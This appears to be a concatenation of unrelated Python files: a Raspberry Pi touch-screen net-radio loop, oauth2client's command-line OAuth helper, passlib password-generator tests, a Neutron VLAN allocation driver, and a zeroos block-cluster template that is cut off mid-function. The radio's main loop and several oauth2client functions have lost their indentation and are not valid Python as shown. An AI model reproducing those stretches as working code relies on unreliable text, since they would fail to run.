        skin1 = pygame.image.load("skins/skin_blue_m1.png")
        skin2 = pygame.image.load("skins/skin_blue_m2.png")
        font_color = cyan
    if skin_number == 2:
        skin1 = pygame.image.load("skins/skin_orange_m1.png")
        skin2 = pygame.image.load("skins/skin_orange_m2.png")
        font_color = orange
    if skin_number == 3:
        skin1 = pygame.image.load("skins/skin_red_m1.png")
        skin2 = pygame.image.load("skins/skin_red_m2.png")
        font_color = red
    if skin_number == 4:
        skin1 = pygame.image.load("skins/skin_white_m1.png")
        skin2 = pygame.image.load("skins/skin_white_m2.png")
        font_color = white
    global menu
    if screensaver == False:
        # render date and time
        current_time = datetime.datetime.now().strftime('%H:%M')
        time_label = fontLarge.render(current_time, 1, (font_color))
        current_time = datetime.datetime.now().strftime('%d.%m.%Y')
        date_label = font.render(current_time, 1, (font_color))
        # display skin menu
        if menu == 1:
            skin = skin1
            screen.blit(skin, (0, 0))
            # get radio information; output is split on ":" to separate
            # the station name from the rest
            lines = subprocess.check_output('mpc current', shell=True).split(":")
            if len(lines) == 1:
                # no ":" separator -> no station metadata available;
                # [:-1] strips the trailing newline
                line1 = lines[0]
                line1 = line1[:-1]
                station_label = font.render("Station: no data", 1, (font_color))
            else:
                line1 = lines[0]
                line2 = lines[1]
                # truncate so the text fits on the display
                line1 = line1[:30]
                station_label = font.render('Station: ' + line1 + '.', 1, (font_color))
            # get title information
            lines = subprocess.check_output('mpc -f [%title%]', shell=True).split("\n")
            line1 = lines[0]
            if line1.startswith("volume"):
                # a leading "volume" line means mpc printed its status
                # line instead of a title (nothing playing)
                title_label = font.render("Title: no data! Try with PLAY!", 1, (font_color))
            else:
                line1 = lines[0]
                line2 = lines[1]
                global song_title
                song_title = line1
                line1 = line1[:30]
                title_label = font.render(line1 + '.', 1, (font_color))
            title = font.render("Now playing:", 1, (font_color))
            # draw screen
            screen.blit(skin, (0, 0))
            screen.blit(station_label, (23, 15))
            screen.blit(title, (23, 40))
            screen.blit(title_label, (23, 60))
            screen.blit(date_label, (23, 132))
            screen.blit(time_label, (190,100))
            lines = subprocess.check_output('mpc volume', shell=True).split("\n")
            line1 = lines[0]
            volume_label = font.render(line1, 1, (font_color))
            screen.blit(volume_label, (23, 102))
            # flip screen buffer to update display
            pygame.display.flip()
        if menu == 2:
            skin = skin2
            screen.blit(skin, (0, 0))
            # display NetRadio version
            radioVersion = font.render('NetRadio V'+__VERSION__+'.'+__RELEASE__, 1, (font_color))
            screen.blit(radioVersion, (23, 15))
            #get and display ip
            ip = subprocess.check_output('hostname -I', shell=True).strip()
            ip_label = font.render('IP: ' + ip, 1, (font_color))
            screen.blit(ip_label, (23, 35))
            #get and display cpu temp (Raspberry Pi firmware tool)
            cpu_temp = subprocess.check_output('/opt/vc/bin/vcgencmd measure_temp', shell=True).strip()
            temp = font.render('cpu ' + cpu_temp, 1, (font_color))
            screen.blit(temp, (23, 55))
            #display current time
            screen.blit(date_label, (23, 132))
            screen.blit(time_label, (190, 100))
            # flip screen buffer to update display
            pygame.display.flip()
    # if screensaver is active, just blank the display
    if screensaver == True:
        screen.fill(black)
        pygame.display.flip()
minutes = 0
#userevent on every 1000ms, used for screensaver
pygame.time.set_timer(USEREVENT +1, 60000)
# start player
subprocess.call('mpc play' , shell=True)
update_screen()
running = True
while running:
for event in pygame.event.get():
# every minute we update minutes counter
if event.type == USEREVENT +1 and menu == 1:
minutes += 1
# different ways to exit
if event.type == pygame.QUIT:
GPIO.cleanup()
print "Quit radio"
GPIO.cleanup()
pygame.quit()
sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == K_ESCAPE:
GPIO.cleanup()
print "Quit radio"
GPIO.cleanup()
pygame.quit()
sys.exit()
#if screensaver is enabled and the screen was touched,
#just disable screensaver, reset timer and update screen
#no button state will be checked
if event.type == pygame.MOUSEBUTTONDOWN and screensaver == True:
minutes = 0
GPIO.output(18, GPIO.HIGH)
screensaver = False
update_screen()
break
#if screen was touched and screensaver is disabled,
#get position of touched button, call on_touch(), reset timer and update screen
if event.type == pygame.MOUSEBUTTONDOWN and screensaver == False:
pos = (pygame.mouse.get_pos() [0], pygame.mouse.get_pos() [1])
minutes = 0
on_touch()
update_screen()
#enable screensaver on timer overflow
if minutes > screensaver_timer:
screensaver = True
GPIO.output(18, GPIO.LOW)
update_screen()
# update screen every 0.1 second to keep title info updated
update_screen()
time.sleep(0.1)
| |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command-line tools for authenticating via OAuth 2.0
Do the OAuth 2.0 Web Server dance for a command line application. Stores the
generated credentials in a common file that is used by other example apps in
the same directory.
"""
from __future__ import print_function
import logging
import socket
import sys
from six.moves import BaseHTTPServer
from six.moves import urllib
from six.moves import input
from oauth2client import client
from oauth2client import util
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
# Public API of this module.
__all__ = ['argparser', 'run_flow', 'message_if_missing']
# Template for message_if_missing(); %s is filled with the path to the
# missing client_secrets.json file.
_CLIENT_SECRETS_MESSAGE = """WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the APIs Console <https://code.google.com/apis/console>.
"""
def _CreateArgumentParser():
try:
import argparse
except ImportError:
return None
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--auth_host_name', default='localhost',
help='Hostname when running a local web server.')
parser.add_argument('--noauth_local_webserver', action='store_true',
default=False, help='Do not run a local web server.')
parser.add_argument('--auth_host_port', default=[8080, 8090], type=int,
nargs='*', help='Port web server should listen on.')
parser.add_argument(
'--logging_level', default='ERROR',
choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],
help='Set the logging level of detail.')
return parser
# argparser is an ArgumentParser that contains command-line options expected
# by tools.run(). Pass it in as part of the 'parents' argument to your own
# ArgumentParser.
# (It is None when argparse could not be imported.)
argparser = _CreateArgumentParser()
class ClientRedirectServer(BaseHTTPServer.HTTPServer):
    """A server to handle OAuth 2.0 redirects back to localhost.
    Waits for a single request and parses the query parameters
    into query_params and then stops serving.
    """
    # Class-level default; ClientRedirectHandler.do_GET overwrites this on
    # the instance with the query parameters of the redirect request.
    query_params = {}
class ClientRedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """A handler for OAuth 2.0 redirects back to localhost.
    Waits for a single request and parses the query parameters
    into the servers query_params and then stops serving.
    """
    def do_GET(self):
        """Handle a GET request.
        Parses the query parameters and prints a message
        if the flow has completed. Note that we can't detect
        if an error occurred.
        """
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        # Everything after the first '?' is the query string (with no '?'
        # the whole path is used; parse_qsl then simply yields nothing).
        raw_query = self.path.split('?', 1)[-1]
        self.server.query_params = dict(urllib.parse.parse_qsl(raw_query))
        for chunk in (
                b"<html><head><title>Authentication Status</title></head>",
                b"<body><p>The authentication flow has completed.</p>",
                b"</body></html>"):
            self.wfile.write(chunk)
    def log_message(self, format, *args):
        """Do not log messages to stdout while running as cmd. line program."""
@util.positional(3)
def run_flow(flow, storage, flags, http=None):
    """Core code for a command-line application.
    The ``run()`` function is called from your application and runs
    through all the steps to obtain credentials. It takes a ``Flow``
    argument and attempts to open an authorization server page in the
    user's default web browser. The server asks the user to grant your
    application access to the user's data. If the user grants access,
    the ``run()`` function returns new credentials. The new credentials
    are also stored in the ``storage`` argument, which updates the file
    associated with the ``Storage`` object.
    It presumes it is run from a command-line application and supports the
    following flags:
    ``--auth_host_name`` (string, default: ``localhost``)
       Host name to use when running a local web server to handle
       redirects during OAuth authorization.
    ``--auth_host_port`` (integer, default: ``[8080, 8090]``)
       Port to use when running a local web server to handle redirects
       during OAuth authorization. Repeat this option to specify a list
       of values.
    ``--[no]auth_local_webserver`` (boolean, default: ``True``)
       Run a local web server to handle redirects during OAuth
       authorization.
    The tools module defines an ``ArgumentParser`` that already contains the
    flag definitions that ``run()`` requires. You can pass that
    ``ArgumentParser`` to your ``ArgumentParser`` constructor::
        parser = argparse.ArgumentParser(
            description=__doc__,
            formatter_class=argparse.RawDescriptionHelpFormatter,
            parents=[tools.argparser])
        flags = parser.parse_args(argv)
    Args:
        flow: Flow, an OAuth 2.0 Flow to step through.
        storage: Storage, a ``Storage`` to store the credential in.
        flags: ``argparse.Namespace``, The command-line flags. This is the
            object returned from calling ``parse_args()`` on
            ``argparse.ArgumentParser`` as described above.
        http: An instance of ``httplib2.Http.request`` or something that
            acts like it.
    Returns:
        Credentials, the obtained credential.
    """
    logging.getLogger().setLevel(getattr(logging, flags.logging_level))
    if not flags.noauth_local_webserver:
        success = False
        port_number = 0
        # Try each candidate port in turn until one can be bound.
        for port in flags.auth_host_port:
            port_number = port
            try:
                httpd = ClientRedirectServer((flags.auth_host_name, port),
                                             ClientRedirectHandler)
            except socket.error:
                pass
            else:
                success = True
                break
        flags.noauth_local_webserver = not success
        if not success:
            # BUG FIX: the old message hardcoded "port 8080" / "port 9090",
            # which was wrong (the defaults are 8080 and 8090) and ignored
            # any user-supplied --auth_host_port values.  Report the ports
            # that were actually attempted.
            print('Failed to start a local webserver listening '
                  'on port(s): %s.'
                  % ', '.join(str(port) for port in flags.auth_host_port))
            print('Please check your firewall settings and locally')
            print('running programs that may be blocking or using those ports.')
            print()
            print('Falling back to --noauth_local_webserver and continuing with')
            print('authorization.')
            print()
    if not flags.noauth_local_webserver:
        oauth_callback = 'http://%s:%s/' % (flags.auth_host_name, port_number)
    else:
        oauth_callback = client.OOB_CALLBACK_URN
    flow.redirect_uri = oauth_callback
    authorize_url = flow.step1_get_authorize_url()
    if not flags.noauth_local_webserver:
        import webbrowser
        webbrowser.open(authorize_url, new=1, autoraise=True)
        print('Your browser has been opened to visit:')
        print()
        print(' ' + authorize_url)
        print()
        print('If your browser is on a different machine then '
              'exit and re-run this')
        print('application with the command-line parameter ')
        print()
        print('  --noauth_local_webserver')
        print()
    else:
        print('Go to the following link in your browser:')
        print()
        print(' ' + authorize_url)
        print()
    code = None
    if not flags.noauth_local_webserver:
        # Block until the browser hits the redirect URI, then inspect it.
        httpd.handle_request()
        if 'error' in httpd.query_params:
            sys.exit('Authentication request was rejected.')
        if 'code' in httpd.query_params:
            code = httpd.query_params['code']
        else:
            print('Failed to find "code" in the query parameters '
                  'of the redirect.')
            sys.exit('Try running with --noauth_local_webserver.')
    else:
        code = input('Enter verification code: ').strip()
    try:
        credential = flow.step2_exchange(code, http=http)
    except client.FlowExchangeError as e:
        sys.exit('Authentication has failed: %s' % e)
    storage.put(credential)
    credential.set_store(storage)
    print('Authentication successful.')
    return credential
def message_if_missing(filename):
    """Return a warning telling the user that *filename* (the
    CLIENT_SECRETS file) is missing and must be populated."""
    missing_path = filename
    return _CLIENT_SECRETS_MESSAGE % missing_path
| |
"""passlib.tests -- tests for passlib.pwd"""
#=============================================================================
# imports
#=============================================================================
# core
import itertools
import logging; log = logging.getLogger(__name__)
# site
# pkg
from passlib.tests.utils import TestCase
# local
__all__ = [
"UtilsTest",
"GenerateTest",
"StrengthTest",
]
#=============================================================================
#
#=============================================================================
class UtilsTest(TestCase):
    """test internal utilities"""
    # prefix used by passlib's TestCase when naming these tests
    descriptionPrefix = "passlib.pwd"
    def test_self_info_rate(self):
        """_self_info_rate()"""
        from passlib.pwd import _self_info_rate
        # empty / single-repeated-symbol strings carry no information
        self.assertEqual(_self_info_rate(""), 0)
        self.assertEqual(_self_info_rate("a" * 8), 0)
        # rate depends only on symbol frequencies, not on string length:
        # two equally likely symbols -> 1 bit/char, four -> 2 bits/char
        self.assertEqual(_self_info_rate("ab"), 1)
        self.assertEqual(_self_info_rate("ab" * 8), 1)
        self.assertEqual(_self_info_rate("abcd"), 2)
        self.assertEqual(_self_info_rate("abcd" * 8), 2)
        # skewed distribution (a: 5/8, b/c/d: 1/8 each) -> ~1.5488 bits/char
        self.assertAlmostEqual(_self_info_rate("abcdaaaa"), 1.5488, places=4)
    # def test_total_self_info(self):
    #     """_total_self_info()"""
    #     from passlib.pwd import _total_self_info
    #
    #     self.assertEqual(_total_self_info(""), 0)
    #
    #     self.assertEqual(_total_self_info("a" * 8), 0)
    #
    #     self.assertEqual(_total_self_info("ab"), 2)
    #     self.assertEqual(_total_self_info("ab" * 8), 16)
    #
    #     self.assertEqual(_total_self_info("abcd"), 8)
    #     self.assertEqual(_total_self_info("abcd" * 8), 64)
    #     self.assertAlmostEqual(_total_self_info("abcdaaaa"), 12.3904, places=4)
#=============================================================================
# word generation
#=============================================================================
# import subject
from passlib.pwd import genword, default_charsets
# charset shortcuts used by the genword tests below
ascii_62 = default_charsets['ascii_62']
# NOTE: shadows the builtin hex() within this module; kept because the
# genword tests below refer to it by this name
hex = default_charsets['hex']
class WordGeneratorTest(TestCase):
    """tests for the word-generation routines"""
    descriptionPrefix = "passlib.pwd.genword()"
    def setUp(self):
        super(WordGeneratorTest, self).setUp()
        # pin the generator's RNG so results are reproducible across runs
        from passlib.pwd import SequenceGenerator
        self.patchAttr(SequenceGenerator, "rng",
                       self.getRandom("pwd generator"))
    def assertResultContents(self, results, count, chars, unique=True):
        """check result list matches expected count & charset"""
        self.assertEqual(len(results), count)
        if unique:
            expected_unique = count if unique is True else unique
            self.assertEqual(len(set(results)), expected_unique)
        self.assertEqual(set("".join(results)), set(chars))
    def test_general(self):
        """general behavior"""
        # default call produces a single 9-character word
        self.assertEqual(len(genword()), 9)
        # malformed keyword should have useful error.
        self.assertRaisesRegex(TypeError, "(?i)unexpected keyword.*badkwd",
                               genword, badkwd=True)
    def test_returns(self):
        """'returns' keyword"""
        # returns=<int> yields a list of that many words
        self.assertResultContents(genword(returns=5000), 5000, ascii_62)
        # returns=iter yields a generator of words
        word_iter = genword(returns=iter)
        sample = [next(word_iter) for _ in range(5000)]
        self.assertResultContents(sample, 5000, ascii_62)
        # anything else is rejected
        self.assertRaises(TypeError, genword, returns='invalid-type')
    def test_charset(self):
        """'charset' & 'chars' options"""
        # named charset
        self.assertResultContents(genword(charset="hex", returns=5000),
                                  5000, hex)
        # explicit chars; only 3**3 == 27 distinct outputs exist, so
        # collisions are expected across 5000 draws
        self.assertResultContents(genword(length=3, chars="abc", returns=5000),
                                  5000, "abc", unique=27)
        # chars and charset are mutually exclusive
        self.assertRaises(TypeError, genword, chars='abc', charset='hex')
    # TODO: test rng option
#=============================================================================
# phrase generation
#=============================================================================
# import subject
from passlib.pwd import genphrase
# tiny wordset that makes collision counts predictable in the tests below
simple_words = ["alpha", "beta", "gamma"]
class PhraseGeneratorTest(TestCase):
    """test generation routines"""
    # prefix used by passlib's TestCase when naming these tests
    descriptionPrefix = "passlib.pwd.genphrase()"
    def assertResultContents(self, results, count, words, unique=True, sep=" "):
        """check result list matches expected count & charset"""
        self.assertEqual(len(results), count)
        if unique:
            if unique is True:
                unique = count
            self.assertEqual(len(set(results)), unique)
        # every word appearing in any phrase must come from *words*
        out = set(itertools.chain.from_iterable(elem.split(sep) for elem in results))
        self.assertEqual(out, set(words))
    def test_general(self):
        """general behavior"""
        # basic usage
        result = genphrase()
        self.assertEqual(len(result.split(" ")), 4)  # 48 / log(7776, 2) ~= 3.7 -> 4
        # malformed keyword should have useful error.
        self.assertRaisesRegex(TypeError, "(?i)unexpected keyword.*badkwd", genphrase, badkwd=True)
    def test_entropy(self):
        """'length' & 'entropy' keywords"""
        # custom entropy
        result = genphrase(entropy=70)
        self.assertEqual(len(result.split(" ")), 6)  # 70 / log(7776, 2) ~= 5.4 -> 6
        # custom length
        result = genphrase(length=3)
        self.assertEqual(len(result.split(" ")), 3)
        # custom length < entropy -- the stronger constraint wins
        result = genphrase(length=3, entropy=48)
        self.assertEqual(len(result.split(" ")), 4)
        # custom length > entropy -- the stronger constraint wins
        result = genphrase(length=4, entropy=12)
        self.assertEqual(len(result.split(" ")), 4)
    def test_returns(self):
        """'returns' keyword"""
        # returns=int option
        results = genphrase(returns=1000, words=simple_words)
        self.assertResultContents(results, 1000, simple_words)
        # returns=iter option
        gen = genphrase(returns=iter, words=simple_words)
        results = [next(gen) for _ in range(1000)]
        self.assertResultContents(results, 1000, simple_words)
        # invalid returns option
        self.assertRaises(TypeError, genphrase, returns='invalid-type')
    def test_wordset(self):
        """'wordset' & 'words' options"""
        # wordset option
        results = genphrase(words=simple_words, returns=5000)
        self.assertResultContents(results, 5000, simple_words)
        # words option; only 3**3 == 27 distinct phrases exist at length 3
        results = genphrase(length=3, words=simple_words, returns=5000)
        self.assertResultContents(results, 5000, simple_words, unique=3**3)
        # words + wordset are mutually exclusive
        self.assertRaises(TypeError, genphrase, words=simple_words, wordset='bip39')
#=============================================================================
# eof
#=============================================================================
| |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from oslo.config import cfg
from six import moves
import sqlalchemy as sa
from neutron.common import constants as q_const
from neutron.common import exceptions as exc
from neutron.common import utils
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.openstack.common import log
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2 import driver_api as api
LOG = log.getLogger(__name__)
# Configuration options registered under the [ml2_type_vlan] group.
vlan_opts = [
    cfg.ListOpt('network_vlan_ranges',
                default=[],
                help=_("List of <physical_network>:<vlan_min>:<vlan_max> or "
                       "<physical_network> specifying physical_network names "
                       "usable for VLAN provider and tenant networks, as "
                       "well as ranges of VLAN tags on each available for "
                       "allocation to tenant networks."))
]
cfg.CONF.register_opts(vlan_opts, "ml2_type_vlan")
class VlanAllocation(model_base.BASEV2):
    """Represent allocation state of a vlan_id on a physical network.
    If allocated is False, the vlan_id on the physical_network is
    available for allocation to a tenant network. If allocated is
    True, the vlan_id on the physical_network is in use, either as a
    tenant or provider network.
    When an allocation is released, if the vlan_id for the
    physical_network is inside the pool described by
    VlanTypeDriver.network_vlan_ranges, then allocated is set to
    False. If it is outside the pool, the record is deleted.
    """
    __tablename__ = 'ml2_vlan_allocations'
    # (physical_network, vlan_id) form the composite primary key
    physical_network = sa.Column(sa.String(64), nullable=False,
                                 primary_key=True)
    # autoincrement=False: vlan_id values are assigned by the driver,
    # never by the database
    vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
                        autoincrement=False)
    # True while the VLAN is in use by a tenant or provider network
    allocated = sa.Column(sa.Boolean, nullable=False)
class VlanTypeDriver(api.TypeDriver):
    """Manage state for VLAN networks with ML2.
    The VlanTypeDriver implements the 'vlan' network_type. VLAN
    network segments provide connectivity between VMs and other
    devices using any connected IEEE 802.1Q conformant
    physical_network segmented into virtual networks via IEEE 802.1Q
    headers. Up to 4094 VLAN network segments can exist on each
    available physical_network.
    """
    def __init__(self):
        self._parse_network_vlan_ranges()
    def _parse_network_vlan_ranges(self):
        """Load network_vlan_ranges from config; exit on malformed input."""
        try:
            self.network_vlan_ranges = plugin_utils.parse_network_vlan_ranges(
                cfg.CONF.ml2_type_vlan.network_vlan_ranges)
            # TODO(rkukura): Validate that each physical_network name
            # is neither empty nor too long.
        except Exception:
            LOG.exception(_("Failed to parse network_vlan_ranges. "
                            "Service terminated!"))
            sys.exit(1)
        LOG.info(_("Network VLAN ranges: %s"), self.network_vlan_ranges)
    def _sync_vlan_allocations(self):
        """Reconcile the allocation table with the configured VLAN ranges."""
        session = db_api.get_session()
        with session.begin(subtransactions=True):
            # get existing allocations for all physical networks
            allocations = dict()
            allocs = (session.query(VlanAllocation).
                      with_lockmode('update'))
            for alloc in allocs:
                if alloc.physical_network not in allocations:
                    allocations[alloc.physical_network] = set()
                allocations[alloc.physical_network].add(alloc)
            # process vlan ranges for each configured physical network
            for (physical_network,
                 vlan_ranges) in self.network_vlan_ranges.items():
                # determine current configured allocatable vlans for
                # this physical network
                vlan_ids = set()
                for vlan_min, vlan_max in vlan_ranges:
                    vlan_ids |= set(moves.xrange(vlan_min, vlan_max + 1))
                # remove from table unallocated vlans not currently
                # allocatable
                if physical_network in allocations:
                    for alloc in allocations[physical_network]:
                        try:
                            # see if vlan is allocatable
                            vlan_ids.remove(alloc.vlan_id)
                        except KeyError:
                            # it's not allocatable, so check if its allocated
                            if not alloc.allocated:
                                # it's not, so remove it from table
                                LOG.debug(_("Removing vlan %(vlan_id)s on "
                                            "physical network "
                                            "%(physical_network)s from pool"),
                                          {'vlan_id': alloc.vlan_id,
                                           'physical_network':
                                           physical_network})
                                session.delete(alloc)
                    del allocations[physical_network]
                # add missing allocatable vlans to table
                for vlan_id in sorted(vlan_ids):
                    alloc = VlanAllocation(physical_network=physical_network,
                                           vlan_id=vlan_id,
                                           allocated=False)
                    session.add(alloc)
            # remove from table unallocated vlans for any unconfigured
            # physical networks.
            # FIX: use values() instead of the Python-2-only itervalues(),
            # consistent with the six.moves compatibility approach used
            # elsewhere in this driver.
            for allocs in allocations.values():
                for alloc in allocs:
                    if not alloc.allocated:
                        LOG.debug(_("Removing vlan %(vlan_id)s on physical "
                                    "network %(physical_network)s from pool"),
                                  {'vlan_id': alloc.vlan_id,
                                   'physical_network':
                                   alloc.physical_network})
                        session.delete(alloc)
    def get_type(self):
        """Return the network_type string this driver handles."""
        return p_const.TYPE_VLAN
    def initialize(self):
        """Sync the allocation table with configuration on startup."""
        self._sync_vlan_allocations()
        LOG.info(_("VlanTypeDriver initialization complete"))
    def validate_provider_segment(self, segment):
        """Reject provider segments with missing, unknown, out-of-range or
        extraneous attributes; raises InvalidInput on any violation."""
        physical_network = segment.get(api.PHYSICAL_NETWORK)
        if not physical_network:
            msg = _("physical_network required for VLAN provider network")
            raise exc.InvalidInput(error_message=msg)
        if physical_network not in self.network_vlan_ranges:
            msg = (_("physical_network '%s' unknown for VLAN provider network")
                   % physical_network)
            raise exc.InvalidInput(error_message=msg)
        segmentation_id = segment.get(api.SEGMENTATION_ID)
        if segmentation_id is None:
            msg = _("segmentation_id required for VLAN provider network")
            raise exc.InvalidInput(error_message=msg)
        if not utils.is_valid_vlan_tag(segmentation_id):
            msg = (_("segmentation_id out of range (%(min)s through "
                     "%(max)s)") %
                   {'min': q_const.MIN_VLAN_TAG,
                    'max': q_const.MAX_VLAN_TAG})
            raise exc.InvalidInput(error_message=msg)
        # no other segment keys may carry a value for a VLAN network
        for key, value in segment.items():
            if value and key not in [api.NETWORK_TYPE,
                                     api.PHYSICAL_NETWORK,
                                     api.SEGMENTATION_ID]:
                msg = _("%s prohibited for VLAN provider network") % key
                raise exc.InvalidInput(error_message=msg)
    def reserve_provider_segment(self, session, segment):
        """Mark the requested (physical_network, vlan_id) as allocated,
        creating an out-of-pool record if none exists."""
        physical_network = segment[api.PHYSICAL_NETWORK]
        vlan_id = segment[api.SEGMENTATION_ID]
        with session.begin(subtransactions=True):
            try:
                alloc = (session.query(VlanAllocation).
                         filter_by(physical_network=physical_network,
                                   vlan_id=vlan_id).
                         with_lockmode('update').
                         one())
                if alloc.allocated:
                    raise exc.VlanIdInUse(vlan_id=vlan_id,
                                          physical_network=physical_network)
                LOG.debug(_("Reserving specific vlan %(vlan_id)s on physical "
                            "network %(physical_network)s from pool"),
                          {'vlan_id': vlan_id,
                           'physical_network': physical_network})
                alloc.allocated = True
            except sa.orm.exc.NoResultFound:
                # vlan lies outside the configured pool -> track it anyway
                LOG.debug(_("Reserving specific vlan %(vlan_id)s on physical "
                            "network %(physical_network)s outside pool"),
                          {'vlan_id': vlan_id,
                           'physical_network': physical_network})
                alloc = VlanAllocation(physical_network=physical_network,
                                       vlan_id=vlan_id,
                                       allocated=True)
                session.add(alloc)
    def allocate_tenant_segment(self, session):
        """Allocate any free vlan from the pool; returns a segment dict or
        None when the pool is exhausted."""
        with session.begin(subtransactions=True):
            alloc = (session.query(VlanAllocation).
                     filter_by(allocated=False).
                     with_lockmode('update').
                     first())
            if alloc:
                LOG.debug(_("Allocating vlan %(vlan_id)s on physical network "
                            "%(physical_network)s from pool"),
                          {'vlan_id': alloc.vlan_id,
                           'physical_network': alloc.physical_network})
                alloc.allocated = True
                return {api.NETWORK_TYPE: p_const.TYPE_VLAN,
                        api.PHYSICAL_NETWORK: alloc.physical_network,
                        api.SEGMENTATION_ID: alloc.vlan_id}
    def release_segment(self, session, segment):
        """Return a vlan to the pool, or delete its record when it lies
        outside the configured ranges."""
        physical_network = segment[api.PHYSICAL_NETWORK]
        vlan_id = segment[api.SEGMENTATION_ID]
        with session.begin(subtransactions=True):
            try:
                alloc = (session.query(VlanAllocation).
                         filter_by(physical_network=physical_network,
                                   vlan_id=vlan_id).
                         with_lockmode('update').
                         one())
                alloc.allocated = False
                inside = False
                for vlan_min, vlan_max in self.network_vlan_ranges.get(
                    physical_network, []):
                    if vlan_min <= vlan_id <= vlan_max:
                        inside = True
                        break
                if not inside:
                    session.delete(alloc)
                    LOG.debug(_("Releasing vlan %(vlan_id)s on physical "
                                "network %(physical_network)s outside pool"),
                              {'vlan_id': vlan_id,
                               'physical_network': physical_network})
                else:
                    LOG.debug(_("Releasing vlan %(vlan_id)s on physical "
                                "network %(physical_network)s to pool"),
                              {'vlan_id': vlan_id,
                               'physical_network': physical_network})
            except sa.orm.exc.NoResultFound:
                LOG.warning(_("No vlan_id %(vlan_id)s found on physical "
                              "network %(physical_network)s"),
                            {'vlan_id': vlan_id,
                             'physical_network': physical_network})
| |
from js9 import j
def input(job):
    """Validate the job arguments before the service is created.

    Rejects caller-supplied 'filesystems'/'arbds' (these are computed by
    init()), requires at least one node, requires the server count to
    spread evenly over the nodes, and requires an etcd_cluster service
    to exist.  Returns the args unchanged.
    """
    for computed_arg in ('filesystems', 'arbds'):
        if job.model.args.get(computed_arg, []) != []:
            raise j.exceptions.Input("{} should not be set as input".format(computed_arg))

    node_list = job.model.args.get('nodes', [])
    server_count = job.model.args.get('nrServer', 0)
    if not node_list:
        raise j.exceptions.Input("Invalid amount of nodes provided")
    if server_count % len(node_list) != 0:
        raise j.exceptions.Input("Invalid spread provided can not evenly spread servers over amount of nodes")

    if not job.service.aysrepo.servicesFind(role='etcd_cluster'):
        raise j.exceptions.Input('No etcd cluster service found.')
    return job.model.args
def get_cluster(job):
    """Return the BlockCluster SAL object backing this service.

    Side effect: refreshes job.context['token'] with a new JWT.
    """
    from zeroos.orchestrator.configuration import get_jwt_token
    from zeroos.orchestrator.sal.StorageCluster import BlockCluster

    token = get_jwt_token(job.service.aysrepo)
    job.context['token'] = token
    return BlockCluster.from_ays(job.service, token)
def init(job):
    """Create the AYS services backing this block cluster.

    For every available data disk on the cluster's nodes this creates a
    storagepool, a filesystem, a container and a storage_engine service,
    then records the created filesystem/storage-engine names on the
    service model and (optionally) installs a Grafana dashboard.
    """
    from zeroos.orchestrator.sal.Node import Node
    from zeroos.orchestrator.sal.StorageCluster import BlockCluster
    from zeroos.orchestrator.configuration import get_configuration
    from zeroos.orchestrator.configuration import get_jwt_token
    job.context['token'] = get_jwt_token(job.service.aysrepo)
    service = job.service
    # resolve the SAL node objects for all producer node services
    nodes = set()
    for node_service in service.producers['node']:
        nodes.add(Node.from_ays(node_service, job.context['token']))
    nodes = list(nodes)
    nodemap = {node.name: node for node in nodes}
    # disks not yet claimed by any storagepool, grouped per node
    availabledisks = get_availabledisks(job)
    blockcluster_sal = BlockCluster.from_ays(service, job.context['token'])
    datadisks = blockcluster_sal.get_disks(availabledisks)
    # lets create some services
    spactor = service.aysrepo.actorGet("storagepool")
    fsactor = service.aysrepo.actorGet("filesystem")
    containeractor = service.aysrepo.actorGet("container")
    storageEngineActor = service.aysrepo.actorGet("storage_engine")
    # collected across all create_server() calls below
    filesystems = []
    storageEngines = []
    def create_server(node, disk, baseport, tcp):
        """Create storagepool + filesystem + container + storage_engine
        services for one disk, binding the engine to *baseport*."""
        diskmap = [{'device': disk.devicename}]
        args = {
            'node': node.name,
            'metadataProfile': 'single',
            'dataProfile': 'single',
            'devices': diskmap
        }
        storagepoolname = 'cluster_{}_{}_{}'.format(node.name, service.name, disk.name)
        spservice = spactor.serviceCreate(instance=storagepoolname, args=args)
        service.consume(spservice)
        containername = '{}_{}'.format(storagepoolname, baseport)
        # adding filesystem
        args = {
            'storagePool': storagepoolname,
            'name': containername,
        }
        fs_service = fsactor.serviceCreate(instance=containername, args=args)
        filesystems.append(fs_service)
        config = get_configuration(job.service.aysrepo)
        service.consume(fs_service)
        # create containers
        args = {
            'node': node.name,
            'hostname': containername,
            'flist': config.get('storage-engine-flist', 'https://hub.gig.tech/gig-official-apps/ardb-rocksdb.flist'),
            'mounts': [{'filesystem': containername, 'target': '/mnt/data'}],
            'hostNetworking': True
        }
        containeractor.serviceCreate(instance=containername, args=args)
        # create storageEngines
        args = {
            'homeDir': '/mnt/data',
            'bind': '{}:{}'.format(node.storageAddr, baseport),
            'container': containername
        }
        storageEngine = storageEngineActor.serviceCreate(instance=containername, args=args)
        storageEngine.consume(tcp)
        storageEngines.append(storageEngine)
    for nodename, disks in datadisks.items():
        node = nodemap[nodename]
        # making the storagepool
        # one port (and tcp service) per disk on this node
        nrports = len(disks)
        baseports, tcpservices = get_baseports(job, node, baseport=2000, nrports=nrports)
        for idx, disk in enumerate(disks):
